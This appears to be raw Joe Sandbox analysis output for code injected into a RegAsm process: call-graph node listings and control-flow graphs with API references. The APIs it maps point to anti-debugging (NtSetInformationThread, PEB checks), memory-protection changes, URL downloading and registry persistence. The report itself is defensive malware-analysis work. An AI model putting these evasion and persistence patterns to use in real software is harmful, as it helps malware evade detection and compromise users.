7953->7951 7953->7952 7957 c310ea 7953->7957 7959 c311bf 7953->7959 7976 c3114f 7953->7976 7988 c3949d 7953->7988 8003 c34c36 7953->8003 8006 c381cf 7953->8006 8016 c34109 GetPEB 7953->8016 8018 c37ce8 7953->8018 8050 c31864 7953->8050 8054 c317bf 7953->8054 7956 c38aa5 7955->7956 7963 c31100 7957->7963 8021 c33189 
7957->8021 7961 c311de 7959->7961 7962 c311d1 7959->7962 7965 c31864 GetLongPathNameW 7959->7965 7961->7963 7964 c35a43 7961->7964 7962->7961 8139 c31d3f 7962->8139 7969 c39eee 24 API calls 7963->7969 8147 c311f0 7964->8147 7965->7962 7971 c34107 7969->7971 7970 c35a48 7977 c35a58 7970->7977 8212 c352b9 InternetOpenA 7970->8212 7974 c3949d 4 API calls 7974->7976 7976->7953 7976->7974 8062 c31719 7976->8062 8131 c31dbc 7976->8131 7989 c381cf 2 API calls 7988->7989 7990 c394aa 7989->7990 7991 c381cf 2 API calls 7990->7991 7992 c394c3 GetPEB 7991->7992 8227 c39b4c NtProtectVirtualMemory 7992->8227 7994 c39a53 7994->7953 7997 c39ade 7994->7997 7998 c39a84 7994->7998 7996 c39b44 7996->7953 8230 c39b4c NtProtectVirtualMemory 7997->8230 8229 c39b4c NtProtectVirtualMemory 7998->8229 8000 c39515 8000->7994 8000->8000 8228 c39b4c NtProtectVirtualMemory 8000->8228 8001 c39adb 8001->7953 8004 c381cf 2 API calls 8003->8004 8005 c34c43 8004->8005 8005->7953 8007 c381e1 8006->8007 8008 c3822b LoadLibraryA 8006->8008 8009 c38799 GetPEB 8007->8009 8010 c38235 8008->8010 8011 c381ed 8009->8011 8010->7926 8012 c38219 8011->8012 8013 c38799 GetPEB 8011->8013 8012->8008 8014 c38204 8013->8014 8014->8012 8015 c38799 GetPEB 8014->8015 8015->8012 8017 c34517 8016->8017 8017->7953 8231 c381b7 GetPEB 8018->8231 8020 c37ced 8022 c331e1 8021->8022 8023 c39eee 24 API calls 8022->8023 8024 c3452b 8022->8024 8029 c33601 8023->8029 8024->7957 8025 c33df6 8026 c39eee 24 API calls 8025->8026 8027 c33e07 8026->8027 8028 c39eee 24 API calls 8027->8028 8030 c33e15 8028->8030 8029->8025 8033 c39eee 24 API calls 8029->8033 8031 c39eee 24 API calls 8030->8031 8032 c33e2d 8031->8032 8035 c39eee 24 API calls 8032->8035 8034 c33723 8033->8034 8034->8025 8037 c39eee 24 API calls 8034->8037 8036 c33e48 8035->8036 8036->7957 8038 c33761 8037->8038 8038->8025 8039 c39eee 24 API calls 8038->8039 8040 c337c7 8039->8040 8040->8025 8041 c39eee 24 API calls 8040->8041 8042 c33952 8041->8042 8042->8025 8043 c39eee 24 
API calls 8042->8043 8044 c33d94 8043->8044 8044->8025 8045 c33d9b 8044->8045 8046 c39eee 24 API calls 8045->8046 8047 c33db6 8046->8047 8048 c39eee 24 API calls 8047->8048 8049 c33dce 8048->8049 8049->7957 8051 c36913 8050->8051 8232 c3186b 8051->8232 8053 c36918 8053->7953 8055 c368d3 8054->8055 8241 c317ce RegCreateKeyExA 8055->8241 8057 c368d8 8058 c36918 8057->8058 8251 c31d5a 8057->8251 8058->7953 8061 c3186b GetLongPathNameW 8061->8058 8063 c39eee 23 API calls 8062->8063 8064 c31740 8063->8064 8065 c39eee 23 API calls 8064->8065 8066 c3175f 8065->8066 8067 c31775 8066->8067 8074 c3062c 8066->8074 8068 c39eee 23 API calls 8067->8068 8070 c317a7 8068->8070 8069 c381cf LoadLibraryA GetPEB 8069->8074 8071 c39eee 23 API calls 8070->8071 8109 c31100 8071->8109 8072 c39eee 23 API calls 8073 c34107 8072->8073 8073->7976 8074->8069 8075 c34c36 2 API calls 8074->8075 8076 c381cf 2 API calls 8074->8076 8079 c33189 8074->8079 8081 c34109 GetPEB 8074->8081 8098 c39eee 23 API calls 8074->8098 8099 c38a84 8074->8099 8100 c37ce8 GetPEB 8074->8100 8103 c310ea 8074->8103 8105 c311bf 8074->8105 8106 c31864 GetLongPathNameW 8074->8106 8114 c317bf 23 API calls 8074->8114 8118 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8074->8118 8119 c31719 23 API calls 8074->8119 8121 c31dbc 23 API calls 8074->8121 8075->8074 8077 c30aae NtSetInformationThread 8076->8077 8078 c381cf 2 API calls 8077->8078 8078->8074 8080 c39eee 23 API calls 8079->8080 8082 c3452b 8079->8082 8087 c33601 8080->8087 8081->8074 8082->7976 8083 c33df6 8084 c39eee 23 API calls 8083->8084 8085 c33e07 8084->8085 8086 c39eee 23 API calls 8085->8086 8088 c33e15 8086->8088 8087->8083 8091 c39eee 23 API calls 8087->8091 8089 c39eee 23 API calls 8088->8089 8090 c33e2d 8089->8090 8093 c39eee 23 API calls 8090->8093 8092 c33723 8091->8092 8092->8083 8095 c39eee 23 API calls 8092->8095 8094 c33e48 8093->8094 8094->7976 8096 c33761 8095->8096 8096->8083 8097 c39eee 23 API calls 8096->8097 8116 c337c7 8097->8116 
8098->8074 8101 c38799 GetPEB 8099->8101 8100->8074 8102 c38aa5 8101->8102 8102->7976 8104 c33189 23 API calls 8103->8104 8103->8109 8104->8103 8107 c311de 8105->8107 8108 c311d1 8105->8108 8111 c31864 GetLongPathNameW 8105->8111 8106->8074 8107->8109 8110 c35a43 8107->8110 8108->8107 8112 c31d3f 23 API calls 8108->8112 8109->7976 8109->8072 8113 c311f0 23 API calls 8110->8113 8111->8108 8112->8107 8115 c35a48 8113->8115 8114->8074 8117 c352b9 23 API calls 8115->8117 8120 c35a58 8115->8120 8116->8083 8122 c39eee 23 API calls 8116->8122 8117->8120 8118->8074 8119->8074 8121->8074 8123 c33952 8122->8123 8123->8083 8124 c39eee 23 API calls 8123->8124 8125 c33d94 8124->8125 8125->8083 8126 c33d9b 8125->8126 8127 c39eee 23 API calls 8126->8127 8128 c33db6 8127->8128 8129 c39eee 23 API calls 8128->8129 8130 c33dce 8129->8130 8130->7976 8132 c39eee 24 API calls 8131->8132 8134 c31de5 8132->8134 8133 c31e61 8133->7976 8134->8133 8135 c39eee 24 API calls 8134->8135 8136 c31e2b 8135->8136 8137 c31e59 8136->8137 8138 c39eee 24 API calls 8136->8138 8137->7976 8138->8137 8140 c31d53 8139->8140 8141 c31d5a 24 API calls 8140->8141 8142 c3690f 8141->8142 8143 c3186b GetLongPathNameW 8142->8143 8144 c36918 8143->8144 8144->7961 8256 c39ef3 8145->8256 8150 c31217 8147->8150 8152 c31100 8150->8152 8182 c3062c 8150->8182 8326 c393ed 8150->8326 8337 c31e6c 8150->8337 8353 c316be 8150->8353 8154 c39eee 23 API calls 8152->8154 8153 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8153->8182 8156 c34107 8154->8156 8155 c34c36 2 API calls 8155->8182 8156->7970 8157 c381cf 2 API calls 8158 c30aae NtSetInformationThread 8157->8158 8159 c381cf 2 API calls 8158->8159 8159->8182 8160 c33189 8161 c39eee 23 API calls 8160->8161 8163 c3452b 8160->8163 8169 c33601 8161->8169 8162 c34109 GetPEB 8162->8182 8163->7970 8164 c33df6 8165 c39eee 23 API calls 8164->8165 8167 c33e07 8165->8167 8166 c381cf LoadLibraryA GetPEB 8166->8182 8168 c39eee 23 API calls 8167->8168 8170 c33e15 8168->8170 
8169->8164 8173 c39eee 23 API calls 8169->8173 8171 c39eee 23 API calls 8170->8171 8172 c33e2d 8171->8172 8175 c39eee 23 API calls 8172->8175 8174 c33723 8173->8174 8174->8164 8177 c39eee 23 API calls 8174->8177 8176 c33e48 8175->8176 8176->7970 8178 c33761 8177->8178 8178->8164 8179 c39eee 23 API calls 8178->8179 8198 c337c7 8179->8198 8180 c39eee 23 API calls 8180->8182 8181 c38a84 8184 c38799 GetPEB 8181->8184 8182->8153 8182->8155 8182->8157 8182->8160 8182->8162 8182->8166 8182->8180 8182->8181 8183 c37ce8 GetPEB 8182->8183 8186 c310ea 8182->8186 8188 c311bf 8182->8188 8189 c31864 GetLongPathNameW 8182->8189 8196 c317bf 23 API calls 8182->8196 8200 c31719 23 API calls 8182->8200 8202 c31dbc 23 API calls 8182->8202 8183->8182 8185 c38aa5 8184->8185 8185->7970 8186->8152 8187 c33189 23 API calls 8186->8187 8187->8186 8190 c311de 8188->8190 8191 c311d1 8188->8191 8193 c31864 GetLongPathNameW 8188->8193 8189->8182 8190->8152 8192 c35a43 8190->8192 8191->8190 8194 c31d3f 23 API calls 8191->8194 8195 c311f0 23 API calls 8192->8195 8193->8191 8194->8190 8197 c35a48 8195->8197 8196->8182 8199 c352b9 23 API calls 8197->8199 8201 c35a58 8197->8201 8198->8164 8203 c39eee 23 API calls 8198->8203 8199->8201 8200->8182 8202->8182 8204 c33952 8203->8204 8204->8164 8205 c39eee 23 API calls 8204->8205 8206 c33d94 8205->8206 8206->8164 8207 c33d9b 8206->8207 8208 c39eee 23 API calls 8207->8208 8209 c33db6 8208->8209 8210 c39eee 23 API calls 8209->8210 8211 c33dce 8210->8211 8211->7970 8213 c357fa 8212->8213 8214 c352d9 8212->8214 8216 c39eee 22 API calls 8213->8216 8215 c39eee 22 API calls 8214->8215 8217 c35306 8215->8217 8218 c3580a 8216->8218 8217->8213 8219 c35310 InternetOpenUrlA 8217->8219 8218->7977 8219->8213 8221 c3533c 8219->8221 8220 c39eee 22 API calls 8220->8221 8221->8213 8221->8220 8222 c357b6 8221->8222 8223 c39eee 22 API calls 8222->8223 8224 c357ce 8223->8224 8225 c39eee 22 API calls 8224->8225 8226 c357e1 8225->8226 8226->7977 8227->8000 8228->7994 8229->8001 
8230->7996 8231->8020 8233 c3694e 8232->8233 8236 c3187b 8233->8236 8235 c36953 8235->8053 8237 c31898 8236->8237 8240 c37c33 GetLongPathNameW 8237->8240 8239 c318b8 8239->8235 8240->8239 8242 c31818 8241->8242 8255 c31820 RegSetValueExA 8242->8255 8244 c368c2 8245 c317ce 23 API calls 8244->8245 8246 c36918 8244->8246 8247 c368d8 8245->8247 8246->8057 8247->8246 8248 c31d5a 23 API calls 8247->8248 8249 c3690f 8248->8249 8250 c3186b GetLongPathNameW 8249->8250 8250->8246 8252 c31d68 8251->8252 8253 c31dbc 24 API calls 8252->8253 8254 c31db9 8253->8254 8254->8061 8255->8244 8257 c39ef8 8256->8257 8257->8257 8323 c38fc5 8257->8323 8259 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8276 c3062c 8259->8276 8260 c34c36 2 API calls 8260->8276 8261 c381cf 2 API calls 8263 c30aae NtSetInformationThread 8261->8263 8262 c3a308 8266 c3a7b1 8262->8266 8268 c3a7f4 8262->8268 8262->8276 8264 c381cf 2 API calls 8263->8264 8264->8276 8265 c3a7d8 NtQueryInformationProcess 8265->8266 8266->8265 8266->8266 8266->8268 8267 c33189 8269 c39eee 22 API calls 8267->8269 8271 c3452b 8267->8271 8268->8268 8273 c33601 8269->8273 8270 c34109 GetPEB 8270->8276 8272 c33df6 8274 c39eee 22 API calls 8272->8274 8273->8272 8281 c39eee 22 API calls 8273->8281 8275 c33e07 8274->8275 8277 c39eee 22 API calls 8275->8277 8276->8259 8276->8260 8276->8261 8276->8267 8276->8270 8287 c381cf LoadLibraryA GetPEB 8276->8287 8289 c39eee 22 API calls 8276->8289 8290 c38a84 8276->8290 8291 c37ce8 GetPEB 8276->8291 8294 c310ea 8276->8294 8296 c311bf 8276->8296 8297 c31864 GetLongPathNameW 8276->8297 8305 c317bf 22 API calls 8276->8305 8311 c31719 22 API calls 8276->8311 8313 c31dbc 22 API calls 8276->8313 8278 c33e15 8277->8278 8279 c39eee 22 API calls 8278->8279 8280 c33e2d 8279->8280 8283 c39eee 22 API calls 8280->8283 8282 c33723 8281->8282 8282->8272 8285 c39eee 22 API calls 8282->8285 8284 c33e48 8283->8284 8286 c33761 8285->8286 8286->8272 8288 c39eee 22 API calls 8286->8288 8287->8276 8309 c337c7 
8288->8309 8289->8276 8292 c38799 GetPEB 8290->8292 8291->8276 8293 c38aa5 8292->8293 8295 c33189 22 API calls 8294->8295 8300 c31100 8294->8300 8295->8294 8298 c311de 8296->8298 8299 c311d1 8296->8299 8302 c31864 GetLongPathNameW 8296->8302 8297->8276 8298->8300 8301 c35a43 8298->8301 8299->8298 8303 c31d3f 22 API calls 8299->8303 8306 c39eee 22 API calls 8300->8306 8304 c311f0 22 API calls 8301->8304 8302->8299 8303->8298 8307 c35a48 8304->8307 8305->8276 8308 c34107 8306->8308 8310 c352b9 22 API calls 8307->8310 8312 c35a58 8307->8312 8309->8272 8314 c39eee 22 API calls 8309->8314 8310->8312 8311->8276 8313->8276 8315 c33952 8314->8315 8315->8272 8316 c39eee 22 API calls 8315->8316 8317 c33d94 8316->8317 8317->8272 8318 c33d9b 8317->8318 8319 c39eee 22 API calls 8318->8319 8320 c33db6 8319->8320 8321 c39eee 22 API calls 8320->8321 8322 c33dce 8321->8322 8324 c38799 GetPEB 8323->8324 8325 c38fd8 8324->8325 8325->8262 8327 c39402 8326->8327 8328 c381cf 8326->8328 8327->8150 8329 c3822b LoadLibraryA 8328->8329 8330 c38799 GetPEB 8328->8330 8331 c38235 8329->8331 8332 c381ed 8330->8332 8331->8150 8333 c38799 GetPEB 8332->8333 8334 c38219 8332->8334 8335 c38204 8333->8335 8334->8329 8335->8334 8336 c38799 GetPEB 8335->8336 8336->8334 8338 c381cf 2 API calls 8337->8338 8339 c31e7e 8338->8339 8340 c39eee 23 API calls 8339->8340 8350 c323c9 8339->8350 8340->8339 8342 c32967 GetPEB 8345 c3298e 8342->8345 8343 c32a5f 8344 c32a71 8343->8344 8420 c32f84 8343->8420 8347 c3a810 8344->8347 8424 c32a91 8344->8424 8345->8343 8349 c39eee 23 API calls 8345->8349 8351 c32a2c 8345->8351 8349->8345 8415 c3302c 8350->8415 8352 c39eee 23 API calls 8351->8352 8352->8343 8402 c3062c 8353->8402 8354 c31706 8354->8150 8355 c34c36 2 API calls 8355->8402 8356 c381cf 2 API calls 8357 c30aae NtSetInformationThread 8356->8357 8358 c381cf 2 API calls 8357->8358 8358->8402 8359 c33189 8360 c39eee 23 API calls 8359->8360 8362 c3452b 8359->8362 8367 c33601 8360->8367 8361 c34109 GetPEB 8361->8402 
8362->8150 8363 c33df6 8364 c39eee 23 API calls 8363->8364 8365 c33e07 8364->8365 8366 c39eee 23 API calls 8365->8366 8368 c33e15 8366->8368 8367->8363 8371 c39eee 23 API calls 8367->8371 8369 c39eee 23 API calls 8368->8369 8370 c33e2d 8369->8370 8373 c39eee 23 API calls 8370->8373 8372 c33723 8371->8372 8372->8363 8375 c39eee 23 API calls 8372->8375 8374 c33e48 8373->8374 8374->8150 8376 c33761 8375->8376 8376->8363 8378 c39eee 23 API calls 8376->8378 8377 c381cf LoadLibraryA GetPEB 8377->8402 8399 c337c7 8378->8399 8379 c39eee 23 API calls 8379->8402 8380 c38a84 8382 c38799 GetPEB 8380->8382 8381 c37ce8 GetPEB 8381->8402 8383 c38aa5 8382->8383 8383->8150 8384 c310ea 8385 c33189 23 API calls 8384->8385 8390 c31100 8384->8390 8385->8384 8386 c311bf 8388 c311de 8386->8388 8389 c311d1 8386->8389 8392 c31864 GetLongPathNameW 8386->8392 8387 c31864 GetLongPathNameW 8387->8402 8388->8390 8391 c35a43 8388->8391 8389->8388 8393 c31d3f 23 API calls 8389->8393 8396 c39eee 23 API calls 8390->8396 8394 c311f0 23 API calls 8391->8394 8392->8389 8393->8388 8397 c35a48 8394->8397 8395 c317bf 23 API calls 8395->8402 8398 c34107 8396->8398 8400 c352b9 23 API calls 8397->8400 8404 c35a58 8397->8404 8398->8150 8399->8363 8406 c39eee 23 API calls 8399->8406 8400->8404 8401 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8401->8402 8402->8150 8402->8354 8402->8355 8402->8356 8402->8359 8402->8361 8402->8377 8402->8379 8402->8380 8402->8381 8402->8384 8402->8386 8402->8387 8402->8395 8402->8401 8403 c31719 23 API calls 8402->8403 8405 c31dbc 23 API calls 8402->8405 8403->8402 8405->8402 8407 c33952 8406->8407 8407->8363 8408 c39eee 23 API calls 8407->8408 8409 c33d94 8408->8409 8409->8363 8410 c33d9b 8409->8410 8411 c39eee 23 API calls 8410->8411 8412 c33db6 8411->8412 8413 c39eee 23 API calls 8412->8413 8414 c33dce 8413->8414 8414->8150 8416 c330a5 8415->8416 8417 c3060e 8415->8417 8416->8342 8417->8416 8439 c305e5 EnumWindows 8417->8439 8419 c30613 8419->8342 8421 c32f89 
8420->8421 8505 c32f8e 8421->8505 8423 c34cf9 8423->8344 8425 c32aa5 8424->8425 8425->8425 8426 c32aaf GetPEB 8425->8426 8427 c39eee 21 API calls 8426->8427 8428 c32afb 8427->8428 8429 c32a7c 8428->8429 8430 c39eee 21 API calls 8428->8430 8431 c32a91 21 API calls 8429->8431 8435 c3a810 8429->8435 8432 c32b24 Sleep 8430->8432 8431->8435 8433 c32f6b TerminateThread 8432->8433 8434 c32b3e 8432->8434 8433->8434 8513 c32b4a 8434->8513 8435->8435 8440 c305ff 8439->8440 8444 c3062c 8439->8444 8441 c305e5 22 API calls 8440->8441 8442 c30613 8441->8442 8442->8419 8443 c3949d 4 API calls 8443->8444 8444->8443 8445 c34c36 2 API calls 8444->8445 8446 c381cf 2 API calls 8444->8446 8449 c33189 8444->8449 8451 c34109 GetPEB 8444->8451 8467 c381cf LoadLibraryA GetPEB 8444->8467 8469 c39eee 22 API calls 8444->8469 8470 c38a84 8444->8470 8471 c37ce8 GetPEB 8444->8471 8474 c310ea 8444->8474 8476 c311bf 8444->8476 8477 c31864 GetLongPathNameW 8444->8477 8485 c317bf 22 API calls 8444->8485 8493 c3114f 8444->8493 8445->8444 8447 c30aae NtSetInformationThread 8446->8447 8448 c381cf 2 API calls 8447->8448 8448->8444 8450 c39eee 22 API calls 8449->8450 8452 c3452b 8449->8452 8456 c33601 8450->8456 8451->8444 8452->8419 8453 c33df6 8454 c39eee 22 API calls 8453->8454 8455 c33e07 8454->8455 8457 c39eee 22 API calls 8455->8457 8456->8453 8461 c39eee 22 API calls 8456->8461 8458 c33e15 8457->8458 8459 c39eee 22 API calls 8458->8459 8460 c33e2d 8459->8460 8463 c39eee 22 API calls 8460->8463 8462 c33723 8461->8462 8462->8453 8465 c39eee 22 API calls 8462->8465 8464 c33e48 8463->8464 8464->8419 8466 c33761 8465->8466 8466->8453 8468 c39eee 22 API calls 8466->8468 8467->8444 8489 c337c7 8468->8489 8469->8444 8472 c38799 GetPEB 8470->8472 8471->8444 8473 c38aa5 8472->8473 8473->8419 8475 c33189 22 API calls 8474->8475 8480 c31100 8474->8480 8475->8474 8478 c311de 8476->8478 8479 c311d1 8476->8479 8482 c31864 GetLongPathNameW 8476->8482 8477->8444 8478->8480 8481 c35a43 8478->8481 8479->8478 8483 
c31d3f 22 API calls 8479->8483 8486 c39eee 22 API calls 8480->8486 8484 c311f0 22 API calls 8481->8484 8482->8479 8483->8478 8487 c35a48 8484->8487 8485->8444 8488 c34107 8486->8488 8490 c352b9 22 API calls 8487->8490 8494 c35a58 8487->8494 8488->8419 8489->8453 8496 c39eee 22 API calls 8489->8496 8490->8494 8491 c3949d 4 API calls 8491->8493 8492 c31719 22 API calls 8492->8493 8493->8444 8493->8491 8493->8492 8495 c31dbc 22 API calls 8493->8495 8495->8493 8497 c33952 8496->8497 8497->8453 8498 c39eee 22 API calls 8497->8498 8499 c33d94 8498->8499 8499->8453 8500 c33d9b 8499->8500 8501 c39eee 22 API calls 8500->8501 8502 c33db6 8501->8502 8503 c39eee 22 API calls 8502->8503 8504 c33dce 8503->8504 8504->8419 8506 c32f9b 8505->8506 8508 c3060e 8506->8508 8511 c32f89 8506->8511 8507 c32f8e 24 API calls 8512 c34cf9 8507->8512 8509 c305e5 24 API calls 8508->8509 8510 c30613 8509->8510 8510->8423 8511->8423 8511->8507 8512->8423 8514 c32f54 TerminateThread 8513->8514 8516 c34bb7 8514->8516 8517 c32b4a 23 API calls 8516->8517 8519 c34bbc 8517->8519 8518 c38fc5 GetPEB 8518->8519 8519->8518 8520 c3a80b 8519->8520 8521 c3a810 8520->8521 8522 c32a91 23 API calls 8520->8522 8522->8521 8549 1d89a2d6 8550 1d89a302 SetErrorMode 8549->8550 8552 1d89a32b 8549->8552 8551 1d89a317 8550->8551 8552->8550

                                  Executed Functions

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 c305e5-c305fd EnumWindows 1 c305ff-c3060e call c305e5 0->1 2 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 0->2 11 c30613-c30626 1->11 23 c30aeb-c30b00 2->23 24 c30b06-c30b23 call c38314 23->24 25 c33189-c331e1 call c33e58 23->25 29 c30b28-c30b2c 24->29 31 c331e6-c335ed 25->31 32 c331e1 call c33e58 25->32 29->23 30 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 29->30 62 c30b8b-c30bf3 call c381cf call c39eee 30->62 63 c31078-c310d8 call c381cf * 2 call c39eee 30->63 35 c335f3-c33620 call c39eee 31->35 36 c3452b-c34534 31->36 32->31 47 c33df6-c33e51 call c39eee * 4 35->47 48 c33626-c33726 call c33fdf call c37d70 call c39eee 35->48 38 c34535-c3454c 36->38 38->38 41 c3454e-c345a2 38->41 48->47 74 c3372c-c33767 call c39eee 48->74 62->63 81 c30bf9-c30c05 62->81 95 c38a84-c38f11 call c38799 call c38ab5 63->95 96 c310de-c310e8 call c37ce8 63->96 74->47 83 c3376d-c337cc call c39eee 74->83 84 c30c0b-c30c2a call c382c4 81->84 83->47 92 c337d2-c337d7 83->92 93 c30c51-c30c56 84->93 94 c30c2c-c30c35 84->94 92->47 98 c337dd-c33825 call c337f9 92->98 93->95 101 c30c5c-c31053 93->101 94->95 99 c30c3b-c30c40 94->99 110 c3110b-c31111 96->110 111 c310ea 96->111 121 c33827-c3382c 98->121 122 c33834-c33840 98->122 99->95 104 c30c46-c30c4b 99->104 101->95 107 c31059-c3105e 101->107 104->93 104->95 107->95 113 c31064-c31069 107->113 116 c31117-c31143 call c31864 call c37d70 call c317bf 110->116 117 c311af-c311b9 110->117 112 c310f4-c310fe call c33189 111->112 134 c31100-c31104 112->134 113->95 119 c3106f-c31072 113->119 116->2 155 c31149-c3114d 116->155 117->2 123 c311bf-c311c4 117->123 119->63 119->84 121->47 127 c33832 121->127 122->47 128 c33841-c3388e call c38314 122->128 129 c311c6-c311ca 123->129 130 c311de-c311eb 123->130 127->122 128->47 148 c33894-c33919 call c3452b call c338d6 128->148 131 c311d9 call c31d3f 129->131 132 
c311cc-c311d7 call c31864 129->132 135 c35a43-c35a52 call c311f0 130->135 136 c340a3-c34108 call c39eee 130->136 131->130 132->130 132->131 134->136 151 c35a56 135->151 152 c35abf-c35ac6 call c352b9 135->152 148->47 179 c3391f-c33957 call c39eee 148->179 156 c35a58-c35a7f 151->156 157 c35abd-c35abe 151->157 164 c35b31-c35f1a 152->164 165 c35ac8-c35ae3 152->165 155->117 161 c3114f-c311ae call c3949d call c31719 call c31dbc 155->161 167 c35a82-c35aac 156->167 168 c35ae7-c35aee 156->168 157->152 161->117 171 c35ae4 165->171 167->171 180 c35aae-c35ac6 call c35200 167->180 173 c35af0-c35b1e 168->173 174 c35b1f-c35b2c 168->174 171->168 173->174 174->164 179->47 187 c3395d-c33d99 call c39eee 179->187 180->164 180->165 187->47 192 c33d9b-c33dd3 call c39eee * 2 187->192
                                  APIs
                                  • EnumWindows.USER32(00C30613,?,00000000,00C3643A,00C35F92,?,00C331E6,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 00C305F4
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$249E$249E$shell32
                                  • API String ID: 1954852945-4191954164
                                  • Opcode ID: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction ID: d92168b9f47fe779e9444ab1e3c852425cbfa68fc0c748bba569c72db4d081ac
                                  • Opcode Fuzzy Hash: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction Fuzzy Hash: 4652E293E2E9143B96A05D29FCE23AB96E55751310FB8E2099E119F74FE76CF80243C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 197 c316be 198 c316bf-c316d7 197->198 199 c316f0-c31700 198->199 200 c316d9-c316e3 198->200 202 c31706-c3170d 199->202 203 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 199->203 200->198 201 c316e5-c316eb 200->201 201->199 220 c30aeb-c30b00 203->220 221 c30b06-c30b2c call c38314 220->221 222 c33189-c331e1 call c33e58 220->222 221->220 227 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 221->227 228 c331e6-c335ed 222->228 229 c331e1 call c33e58 222->229 259 c30b8b-c30bf3 call c381cf call c39eee 227->259 260 c31078-c310d8 call c381cf * 2 call c39eee 227->260 232 c335f3-c33620 call c39eee 228->232 233 c3452b-c34534 228->233 229->228 244 c33df6-c33e51 call c39eee * 4 232->244 245 c33626-c33726 call c33fdf call c37d70 call c39eee 232->245 235 c34535-c3454c 233->235 235->235 238 c3454e-c345a2 235->238 245->244 271 c3372c-c33767 call c39eee 245->271 259->260 278 c30bf9-c30c05 259->278 292 c38a84-c38f11 call c38799 call c38ab5 260->292 293 c310de-c310e8 call c37ce8 260->293 271->244 280 c3376d-c337cc call c39eee 271->280 281 c30c0b-c30c2a call c382c4 278->281 280->244 289 c337d2-c337d7 280->289 290 c30c51-c30c56 281->290 291 c30c2c-c30c35 281->291 289->244 295 c337dd-c33825 call c337f9 289->295 290->292 298 c30c5c-c31053 290->298 291->292 296 c30c3b-c30c40 291->296 307 c3110b-c31111 293->307 308 c310ea 293->308 318 c33827-c3382c 295->318 319 c33834-c33840 295->319 296->292 301 c30c46-c30c4b 296->301 298->292 304 c31059-c3105e 298->304 301->290 301->292 304->292 310 c31064-c31069 304->310 313 c31117-c31143 call c31864 call c37d70 call c317bf 307->313 314 c311af-c311b9 307->314 309 c310f4-c310fe call c33189 308->309 331 c31100-c31104 309->331 310->292 316 c3106f-c31072 310->316 313->203 352 c31149-c3114d 313->352 314->203 320 c311bf-c311c4 314->320 316->260 316->281 318->244 324 c33832 318->324 319->244 325 c33841-c3388e call 
c38314 319->325 326 c311c6-c311ca 320->326 327 c311de-c311eb 320->327 324->319 325->244 345 c33894-c33919 call c3452b call c338d6 325->345 328 c311d9 call c31d3f 326->328 329 c311cc-c311d7 call c31864 326->329 332 c35a43-c35a52 call c311f0 327->332 333 c340a3-c34108 call c39eee 327->333 328->327 329->327 329->328 331->333 348 c35a56 332->348 349 c35abf-c35ac6 call c352b9 332->349 345->244 376 c3391f-c33957 call c39eee 345->376 353 c35a58-c35a7f 348->353 354 c35abd-c35abe 348->354 361 c35b31-c35f1a 349->361 362 c35ac8-c35ae3 349->362 352->314 358 c3114f-c311ae call c3949d call c31719 call c31dbc 352->358 364 c35a82-c35aac 353->364 365 c35ae7-c35aee 353->365 354->349 358->314 368 c35ae4 362->368 364->368 377 c35aae-c35ac6 call c35200 364->377 370 c35af0-c35b1e 365->370 371 c35b1f-c35b2c 365->371 368->365 370->371 371->361 376->244 384 c3395d-c33d99 call c39eee 376->384 377->361 377->362 384->244 389 c33d9b-c33dd3 call c39eee * 2 384->389
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction ID: ad2ead207169fba45a7910bc273afb8bb939989a79980ad655ccb01ee9f8f9c8
                                  • Opcode Fuzzy Hash: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction Fuzzy Hash: 71024670B60349AFEF305E64CC92BDA3762EF46750F644129FE449B2C1CBB99989DB01
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
